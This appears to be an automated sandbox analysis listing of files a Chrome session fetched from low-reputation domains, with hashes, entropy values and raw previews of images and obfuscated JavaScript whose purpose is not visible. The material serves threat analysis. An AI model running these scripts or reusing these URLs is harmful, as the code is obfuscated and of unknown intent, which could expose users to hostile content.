                                                                                                                                                          URL:https://www.image110.com/uploads/76e03c9fd7b7420306571ee61698b7ce.gif
                                                                                                                                                          Preview:GIF89a..d...........e.......gj,M........P.....mWU.....Q.......e]..... ..%.............r..........GV.....................e..1.........zQ/)...........ql.n....e...................#..........(.....8.xn.......c......*)3..................T.............UR5(...........N*.....7...v....U..........f[.i.:.....mF9..nl.N"..{..7..v..........g....!.y.....&........s.j2.UK...S...e.....T.lWo|...F...&....,....o.O.V.......QM.9(..3...h...t......]........I/.......8..[j...1,..4!......u..u|....O...........s.............)/Jw.......J..j7....Rq......wg......T..."....z...P.......TI...................B..08......."5...'.....}..yO..B...............w.......x..4lxv??5@.......*.r..........!.....................................;...............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1390
                                                                                                                                                          Entropy (8bit):7.767542155886903
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:GjixemINGFh6TJ80nT8ddrOQkzbTvWNWUBHs4zp5+rlZZPKUhiq4PdjyME4G1:Gjix1880fQkjshp2jZrUq4PdjG44
                                                                                                                                                          MD5:08DAF0BD0F8536758CF51524F2896ED7
                                                                                                                                                          SHA1:B36359CFC08C4367AB2D09F6CA31F03A503C46D6
                                                                                                                                                          SHA-256:CC4545BD16ACB802417D50A4A50C1A7A8441C536E07AC769AF60345B27E7849B
                                                                                                                                                          SHA-512:AF8D1B61A3452BC238ED6F4DAECE2C4D159E26A78EB5C11980EC584EBB41C3C50502F2B1C509BFA178B8F72650E0058F1888455AED5EC0836856B90D54D70F07
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_hl.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...J>C....gipOS_..jZ_...QGPI!&[CK....W._<.X3.hO.e\....qw._H.l]wLb.fV....Tih34v%..[alT^.nsyfm.........h.ze.[.Y.xNo1&....e...$.lG....k:.]3......UAjF.ZD7d%..pm....R8....WV.XG.VSwE.....F..ZG.KC.l.A4..?..]p...54.]AN.x.5 .q``A..wt.N#$....z6.h2..}..\..R..N.M.G..E.B.<.;.;.:.3.0.^0.&........................................~..{.b.q`..[.[..Z.oW.dT..Q.J..H..C.B.@.>..<.:..9..8..4.o4kE2.{1.u1.m1.0.c/.-.O*.?'.X .O .6....l...r...........(..v.......................................................................q..............o{..y.q..q.p..o.m.yk..j..gxzd.nb..a.O`.._.{P..OjmO..N..M..Ka.J..J.GvzG..E.E..D.o;.R8.?8..3..0.0.70nq/..-..-.+.+.o(.c(U2(.$.Q$.<$.#....(.....|......M...l..y....`..."..l.........y.i1.J.....NtRNS....ZU@1..............}ssnec\E.....................................veJA632,(e,.....IDAT(.b...W......,....^k..1}..i?g.a.xZ.H.$........QL.b.H.ywkbbP..=y...~I1.$.m....f..|.]Z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (57212), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):57212
                                                                                                                                                          Entropy (8bit):5.96791735433038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:bgtq+6jfAEMmU0PGo9KhuiaAc73LtPAFpIwe:7LfhhU1sriaNL5ADi
                                                                                                                                                          MD5:D3C921A5D728B64E494470536D9E16F3
                                                                                                                                                          SHA1:7E54A88B23A6CEF830F88892334037C1C85C4C4F
                                                                                                                                                          SHA-256:BED5E0787FE3F5EB912A33759EB74D06959AAB37C8222F74142C238931871054
                                                                                                                                                          SHA-512:4FF471125C0CF275C0018EBE606A3B51B0DCA718D001D803F5214E2BC40EA0858397D454483CBDCDEE68EE97EBD6E2DFAA90EAA54D890C3242FA1231C5E4EE7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/slides.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMTKsldjsHJxc3D2NNXU5vYE40OJRgaoBlBvc4HpFjFu9ZxUwNbR0twOMtEHZmLTQdW54kUk65A2OkMaXYYU4SGMKGqcRA1CgzAaY285FgMBASCQnDAnFO+QYpkCpCgcTqXHUIAAEiBOGIwuxCXQSfUQHtKFotAckAx2Jg1CzCnsACIoMa8/kCEmc7mE4lQJAAOSg6gAYiMGGgkQ1SBA3uoOVzgAwAOQAHjAzHY7HQOhgDQV41sSFO8AAtHqQOpbDptJwoG6HWAQA10iF9dwHD78oV0pbrdkAHzhr2RpBmgD08ZtaETJoMg3YhoOpotVpzdodWPSLrObrQhZ9foDQZD6UVjZ0MbKtmzSY7A3Ymb7ufziJtjSgeSZJKtKEneSOhRAcQYAGYQGvSBi0OwQFoALIoOEznd7rQhUlxXZiBi2QiBCADWzbrEAUQVIDvIE/L5gDhtABbS8xBvORLDuVo1HIN4Pi+LtMHNEcuwKHsRx9DM8wEao90HfkAGo6CmUh9nFUxmVIpAAGEqx5Z1XTgN1KJfOItCgMQxCgMAGi/IkAQVMDbFOBttBfFcxBAVVVjmBhqjXQhSARE9yMUlB/yQAB5NAjhDEAOBnag1IcLSqLCKA0AkmddmoXZOD3OV+DQOz/QaE54i/YkHWkPIABkUFJO90DhQDzLiF9AJQXEeNVTgtBcGdoCWLSqRQSktAcxLHC09V1IyxEsrQUUxhStKZzeJBhj2AAVFA7x2PYDhf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8183
                                                                                                                                                          Entropy (8bit):7.933589997486501
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:k7TDFVkPbfe2+CN6ZBrI1w5BLRsKBW6zKK:sFaPfp8ZBrywVsKBz
                                                                                                                                                          MD5:41D4B0EEACF32124FF2EB85F9D2D24BF
                                                                                                                                                          SHA1:15E39C743A1281A74E9BEBDA25CE99781D7D0AF1
                                                                                                                                                          SHA-256:74696F24816D74B0EC3AD61ED670649C6704C638F7A95996DD54D62FF01550FD
                                                                                                                                                          SHA-512:41F8981F2FC3CD96769A941382302FD5A58FD85A8FF10FB75AA58C0A13C9029EDFD25995C34896A9196F17A9F421A7D3DF3B0903FEAFB38843E48B97DFD187E2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/card_hl.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:D75D1B4289F211EA9DE9F33FF3F9200E" xmpMM:InstanceID="xmp.iid:D75D1B4189F211EA9DE9F33FF3F9200E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>+,*V....IDATx..\w.U.....z........af.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (936), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):936
                                                                                                                                                          Entropy (8bit):5.796996889235333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V7uPevfUufznTH8N7Tri175TRdTIjawKQILOfAxKSVFJCZ:V7senUuLnTH8Ne5TRiORoIxDVFkZ
                                                                                                                                                          MD5:09557267795A875AAEFDAAD038899F41
                                                                                                                                                          SHA1:515C562BBE590CF792545E4BC9D1849839BDABED
                                                                                                                                                          SHA-256:A6D05280998B89D044E17919C5916F76014D0E10D6162BE6BB0DA10026B6929C
                                                                                                                                                          SHA-512:7DF5876A5BDF085CA6E14E05A1AAAB5A93360935A2E875E38C7077BAA1172D75C3A5646C66B60B4361586BE59798C14459B50D4D1E536DE1ECB48E539EF779AD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/views/home/indexView.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnANgEYBdAGgG8AifAMwHUANSgLhoFc0YAXAS3UxCk0pLgEoqbJCAAESLgCce3SgG4A8mABWIbgDoAJiBo80IAAryUEEPK4BPTMMoB9ZyCQBZFPrYAbEJQUAG5QvmwgzACEAAwAvqIqXJiU0TxmABaUCSHy0jwAvEkpMBA0WaQw+eQwKAC2EOggaFxIzOSxpPpQXFCsHNx8aJji8iBcbPJo1fpoABIocsw8BkZQfly6AMLoclDNujAz83KkJoYAHgBqPCDAzNjEsR0wo90g+n2cvPziOdIghXSPCQQnywDOKGAugAygBpACSADlEslCABBTQAcyyyV0AHpKABqNCEyh4s4gc66TRILK6LjpJqYdhfQaOcQgXQAElM5y4ABUlHBmf1vkMOboKVcbsB8mhJWgLtdbvFVR0kFVRoqbJ8Bj9yH8AQzgaDOVyXiA3gBRfy1JpcET5TnOKS+Gi6ZwwAA+XrQKlG40m0iK+h4QUC5F2vBgm18UCQrUoUuVwEoHWwRT8gWdvgECqVMtILL1QzQIzGEzQweSvh4gQzySgEZgcYTzHlLagAC8u6RugpWuR0qMaO3dMOjCIoPJMWMxz0Z2MnqRsPLeFx/AB+IrpAAs9edQTzLsc9J4G5AolExFEzGdIGGpEPyWk5XlTW3yXSAFYDx6j86SCnk0V43neHoPqIT7/i+b4HOgXD2s4hCfpQEB/s4AEekBHYIUhhCgbe96Ps+lCvlBuHNEhABMqFINAaAYVhJ6UYhzTONRhHgW4ww3je8TXqI6o9NGABKTSGPIABiaCtA8sQqH88iFMklwAKp4gAHDiMCkCCkSEEWopspe5BFO40LRFkHRoH4vhCHZCTyoYNBrL4XD5PIuiUg0thIB0FnRLqYoCEI4hPAkQA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3892), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3892
                                                                                                                                                          Entropy (8bit):5.933717684110119
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V3qAvL+JhpSlUuNmKu0mfb2QCp1JdLOxEoqciilQNFgRFBz6o4dpORiOduBOSLRc:VxajpILEfwMEoqlgRL67siOdA9Rv7z8
                                                                                                                                                          MD5:8EAF323D6BDBE421286B3D7F8D585AB1
                                                                                                                                                          SHA1:F25F1C12BE242C6588D3BBF1B2E48E4CB7644E22
                                                                                                                                                          SHA-256:18C236EB943FFB9BE9C82D7E7CFB109217A244EE12845C104EFC4E3273014CA3
                                                                                                                                                          SHA-512:77E63E8D69C9FD2FEF4C668336B1CFAB434D914966D3730295407BE8C1A98F9223DBB7E98D982E38B9F24B8F3B19A07E2B7D4F8A8DF0197A43BE5A35C3315D6A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/312/menuSub.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwHYBdAGgG8BhARQHEBpALgDMBXNGAFwEt1MuZJAEoKAXzIArADYAJAOasO3PmgFCyPUQCI2SEAAIkXAE49u2gNwB5MJJDcAdABMQLHmhAAFEygggTLgBPTCQybQB9CJAkAFkUZzZpEG1KADcoaTYQJgBCAAYxYUsMkwMQAF4eTG18mAgWbWEyNAqKCF8IJCZsbSQ2MFTtAFsoAA8hj1cJ8hgUYYh0EDQuboo5hZoTKgSQWXmc9k5eflETEC42EzQDHkcQTAAmAE58YUcuAAtlzDuwKcwaCS0nCACEAJoASR4TWEYgkzigXCgSmOqkwZwuVzQ62caC8SM+TBALjcUCSXEcOzQxigK0cMDx+2MmjmaAASigUFxiaSWOTpJTqbT6Yy0MyuABqbQAeh4o3kIAAtBAYHK0NMZfhcI8ZWgoGkZalpDxjD0SPCyMMLp8EmtFVwqNIoAAvF2olT8QRhLQUc6Xa7lPkCymgqYM51usMa9Q+uFCC4AdR4zi+HpOalEPBYAk+pscozGolKBi4FQAJDUAMT9MCxZZsCLaSVffO1xwp5pICqU9wx7QFhtKk3GJVJYkAR0w+WETUsvYBA+tQOHpq4Y+kTQZSCQNWAKa+qSQjj7zhqJq3SB4LoewgAVKET4uTZPp7P3vvU58MZLcMJpRAExwhI+hcF4KDdEcnqZhQ2bThUPZ5sehYAGQoa2x5TCARYUCWZaVkuQ6jB4AB8L4gFOzYYR2GrYdK75CBW1a1vWQJNi2SGOO2naWMep41IOK4juu44UW+c4ETWAysY2VGcdxzjvDAO6YBQyQsDylIoCwLCgRijjqeusSEo4UBgLuAiOJ+XwYkqx4oGwXABMmX4YsIMqPHCwFkA6kLOOm6JcJiAY3CSrj8hSjgAKq8NIDKfHSip+QI3kwOcSIgP5UEZhisE5tRhbCCwKAmJgeEVPkjHUe2wkGcs8hf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2172), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2172
                                                                                                                                                          Entropy (8bit):5.877585224817545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vn0lFbbekm8dl+w0EeRSbpRKT2SyYEbUpXAc36qag/QbWp5fw:VnwekviPEeRSbcyYNXVKqagoba54
                                                                                                                                                          MD5:D3513798288FAAA8CD797CABAC912992
                                                                                                                                                          SHA1:8E11971C54417B6CB021CC23E101C1F5D0197AD6
                                                                                                                                                          SHA-256:2A73F6AE1A5DCE48349D029C5AEE1A89CF75608BC8C06BA57FBACF3BF46D373C
                                                                                                                                                          SHA-512:C5C2E2DC9206A25CF87B1822C0B7EB6F897499ACAC17A3BEA182E3599A631750E664CC80BE7DC2CF4FED9D2CD378099900EC27C8F21760E9EA3AED2DCECDFFBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/menu.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgCYBdAGgG8B5AcQCEBZALgDMBXNGAFwEt1M1SnAJTkAvqUrcIAJxbsuvNP0GkQIgESskIAARJO07l3UBuSmABWILgDoAJiGbc0IAArSUEENM4BPTJyk6gD6wSBI9Ch2rAA2IOoUAG5QMawgjACEAAyiQibJ0jpQALwgmOpZMBDM6kKk3MXkMCgAthDoIGicSIzkLZ2sAMqsYHIcPHwi0iCcrNJoOiA2ZQCM+OtCNpwAFp2YS2DOdvyxMUEoAGoAjgAatUKi4nZQnFBjCpPk07Pz5GhQiV6j3EzTarE4IDsvX+/XeEyUUxmcwWUHsjigsU4NgAqjwYjZ+mhWAAlFDgkAAOSg/QC224SBsABIPOSbDC1I9SP0dlEeuQAOYzehQAAecMU/ERPwWWWKxR29LZAIJooA/FlGGgAD5ahUM/6JFUi8T0gDCMSMcHFfDQIgKOk4xUZ/C2UGkguENheBnKMBiUCQSFqJk4ADJQ1ijiARZRmOVaABJCkAEWCtXDGWd6hs+mkUG4/O2nFq2CyxHDzoA5NhuHYAHrFdRIEb0AZp4iMRL07hgOKVzZIC0ObFYQhZLIPUge81QABes+tSlt5G4cbQNlr4cwGXXFv0Otlct39KxcTQ/J2OvU9AAohTscFTQAZBOmgDS6gycr1SsNfrns5CEI3zIgA9JgiYplqxKUNiAAqN7EkIoFbOEnAuv+85bCgI5eNIpoBmUQGquo6iMKiDjMBiMRYrQRw2Jhs50WgxzrrWk4esMYAJlCbDjBKy4gfMOhoKq67TBA/owGUoEADqgaB/JBGmQiMKR4gegAEtMzCLpKXxIsJFHopiNjMXYNgWmgcDmS62w6Q8ILTC8kJ6XaboifKdJIIIxTAEcKDADYgxvkmJhlOoKwAIIWPytTlDYoHqAA1JwyXqKBUYijYFhBpsOx7HxHxKMI5D2iA8oEgMpAlFmYBRL4tQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x584, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):52608
                                                                                                                                                          Entropy (8bit):7.889908817627699
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BUQlGDwNzTaGuLaPyH3zUnEGikOncJ3s/sLr:KlDEze9myH3zUE8ocBs/sLr
                                                                                                                                                          MD5:ECF5E74C654A6E80214BDE7C2891697A
                                                                                                                                                          SHA1:2597A1C702CD30EA9738BBF688467EA797FFAC1B
                                                                                                                                                          SHA-256:20B0077ECA943239B64047CCE4BA6749CAE35EA0A4822B747EB7AD851120C7B7
                                                                                                                                                          SHA-512:0AD55DD13675778D744EEEDDD3ECB047FB3033CF341CB558E59B47874EFA66BC8E0022EE1CFD64DE6EEFB2A0FE06B9F1C505282C8A7515A91015D64E75641462
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.............C....................................................................C.......................................................................H.................................................................................... .....................................................................................................................................................................................................................................................................................................................................................................P@...........................................................................................M[.........Z,.. ..h.Y....\.Kl.T.9..........s.5............Mj. ..........-.B.:...D....KV.[s.............&s@.........H..............M[*d.......%..$....j.Fe@&.D,..3...........5K.$..d.......Am........!5.$...#:..I.@&..,..$..........s5B%.Id...................@....5.r..5...Z.9.i....CZg!.3...kL.gZ..g3Z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2888
                                                                                                                                                          Entropy (8bit):5.880648602834631
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V9rQQbI04xAVQLzHXcF4W2sJt/4ydaIltY4SmDk4nD8CHJMBz/eRmnwI49:V9/GAS0F4/sf42a78DPjwzBP49
                                                                                                                                                          MD5:D3570B904AB8E24E9D4554D194A1D9D1
                                                                                                                                                          SHA1:ADBBCFE0676FF24097073D4F5E0DF870A2BDA303
                                                                                                                                                          SHA-256:CC8EEC71D279B68A36B6009B06A631B91307252A5A5A764A110012EE3FF1BF96
                                                                                                                                                          SHA-512:8FEC130B9C3D0A9E3DA01928C8C52586BC0619FAB2C768D576CCEF183322980FF84F6AE20A39B838F7399151221FCB2A015BDFC3CBD847E3F1D1C3E4C8DF6147
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/dialBack.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAGAXQBoBvATSgDcA1ALgDMBXNGAFwEt1MQ5HuS4BKSgCI2SEAAIkXAE49uEgNwB5MACsQ3AHQATECx5oQABUUoIIRVwCemYRID6rkEgCyKQ2wA2IBJUdFD+bCBMAITEAL6iaqGK8gC8XJgSACKGABzAEqLkUGn6aJhIhf5pGcQwECwF5CjVEgBy1AAeGo2KLZlsAPQATI1oKZhQmKKYlLHkWrrcmCj6ALZQEADiIFxcdhU4EkhoAMo7vGgA5sFSMopWKKaBN0gAFijAmTxhAEKwcBJSIVKCp0KwONw+GVxIodmxFGhKGB/pdrBxDABJdaXSJSRT+DIAamAZkMH30AGFMq1XBYAIIAFQAEoSJAMeNiQABaCAwAYwFCrVboAaGb7+ZHwfQQK6iCSxBWFSbTWbzHR6dIrdYQLxsLhQXjoA6UGRcE7vT4/JiKfQAdXiVDJJzYYFWPC44M4huhlCSshAaVePCQai4QaQ+gAJKF/DxDAaUDaY3GDSA6f4CaJ9GGQGV2F6oc5xDwAGQl/xGExQAJcfR0iA8M6KOgqEDS97mClhfz1iD+Jxt4VgHiBfQxiJZnN5iHeosg/R2ayKAA+y8wuBSKR4+lhSBrZYrxhY1f8tYAqrwK28PgyUFAFBlAMyugHfowAIRoB8pUabdN5o+mR+mBRLgoiiPEYEOpQ8b6p6kL8DCcIIpQQ4jpEvphBETBoAE/jkH2sAgO8/jGIoTASM+gDJ8YApoqANJGgBc5oA78rBKsSCXJh2FCEgABKIAAI5sDwsKGNExAcQwwY8GAgTCXMYBcGgAAyKDwNEuDkNIdg+MOUkSPKcwCqsEB6iAQnKjMcwLBqyxrBs2y7Ps0zYEcpznGY1zkLcdgPE8QTudenzin88CAsCoJoDBs7wVw8KIpKcCoig6JYlAOKkfCBISMSpLklSNL0syrLspyPJ8vpwpoKK4qxdK
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2084
                                                                                                                                                          Entropy (8bit):7.828276105941885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:mMa2IDTMJvQ+YXFHesNZ1OA6u9f9X1DUcMfnax1bFIEt44:zcAvQ+YXF+sNZ1OAp9X1Afnc1Zh5
                                                                                                                                                          MD5:6D4ED4AD342225EE6B8505E3E4A47199
                                                                                                                                                          SHA1:1BEDE3976E1DAA3FA605D3073651FF6B32CDD068
                                                                                                                                                          SHA-256:35E1685E841B9F019C86E7DBEC2919365D2D51B5FA9FD85B9F4283FFDB3289CF
                                                                                                                                                          SHA-512:4D4B311E569D6B9AEA582DE128C4410B1D6ADA9DA5E6BA844AFC68007561C4513302AE194B929F62C725CBBB80F4C64048542EF547AF9F8BE84DA4FD01952778
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......)20\S....IDATH..k.]U.....>.{....)R.T..".... b$..0..!.H..G.$..1.0...THH4...%$b.R.......Ph...t..s.Z.8..BK.JN.9...o=.........E.'....B..WU<.k.-....}O.r..{.A#B.j..@e...(P.....G.x..}@........p..K..8.*..r9Q. .?Fqm..x^..Ce.....G.=...F.MO-.....:A~.......f ......DEc.DE..`...fz67......<.Nu..I...m)..D.I^.Vk8.hF....@..).)..4(Y...B.....i."R.......k..\..G.......E.....Q4..1'...p.w...`(t.d...-......M44Q.#...Zl.[.....q..fhm..m.k....T.......[l.vV.B#.y.i.z.Q.....p..=.C..T45QHES*.I.Z.c.^X.};o..3.3....?_V.-...^.v..[Q.8...G..h..`-..-\t...p.Gp.@..A..G.k..#.ymz9S.()Y>..1.G.^....VUm..Pq.U[Ys..:1.\7....C..\v.Ab..N....y[.._.ff!..JTa$.g$.....<0.Icfl.$[.2B.4.#:..Wl..S....N....7K><I*..... .6<u:O<}&..R..7~q/k....O,y...=.9..#U..$_!.^......?{.3.3....7..5O.....4..9..Y.@."].{.5yf|9]=.......s.R.:.G ...;t;...lE$..B5......4.h6...9l~........q....wf..n... ..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972879158
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 21 x 21, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3209
                                                                                                                                                          Entropy (8bit):7.880935308883866
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JllcHitlIxv9vk7C1+I4wWHLihk/xZSyzUIE:KIIHUCD4wa3SyAb
                                                                                                                                                          MD5:5DD86F019FE3F739EECE950ACA134B69
                                                                                                                                                          SHA1:D6CC0D28F8DD994AA9D9F9D37DE41911D71C4E5B
                                                                                                                                                          SHA-256:D9D73CD1D77CC9EE6ED8CC22468B0930FCDF05C60118B16578536660F50C4E13
                                                                                                                                                          SHA-512:4AB75ADF4F2317E608A473D10FF56B8D4541A7590D922002639A21F31311D1E795E37172B04655808F04052B52FD031992B0B6584CC83ED6DC724257E67CEF4E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/top/passwd.png
                                                                                                                                                          Preview:.PNG........IHDR.....................gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
